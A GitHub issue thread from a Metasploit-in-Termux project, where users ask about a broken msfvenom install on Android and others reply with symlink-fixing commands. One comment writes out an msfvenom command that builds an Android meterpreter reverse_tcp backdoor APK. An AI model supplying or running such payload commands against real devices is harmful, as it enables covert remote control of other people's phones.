### ISSUE TITLE
When I make payload then I facing problem 

### ISSUE THREAD

**Issue by arav0125** [gushmazuko/metasploit_in_termux#119]
**Is your feature request related to a problem? Please describe.**

**Describe the solution you'd like**
![Screenshot_20220321_161000](https://user-images.githubusercontent.com/91102859/159245518-87436d4c-c090-4d9f-bd59-cf1f3e8ac9b1.jpg)
Please solve my problems fast 
Device:- vivo1820

**Comment by dedshit** [comment]
goto metasploit directory and type this as follows

rm $PREFIX/msfvenom
ln -s $HOME/metasploit-framework/msfvenom /data/data/com.termux/files/usr/bin/

now close your issues asap

**Comment by CyberKid1987** [comment]
Dude have you use Metasploit again on past?

~msfconsole

~/data/data/com.termux/files/usr/bin/msfvenom –p android/meterpreter/reverse_tcp LHOST=Localhost IP  LPORT=LocalPort R > android_shell.apk

**Comment by jirokul** [comment]
> goto metasploit directory and type this as follows
> 
> rm $PREFIX/bin/msfvenom ln -s $HOME/metasploit-framework/msfvenom $PREFIX/bin/
> 
> now close your issues asap

where is the metasploit folder located? I don't have it, I installed it via manual procedure. Device: realme c21y
![msfvenom](https://user-images.githubusercontent.com/6198692/167758618-742da371-81ae-4773-9d0a-5d91eb06e168.png)
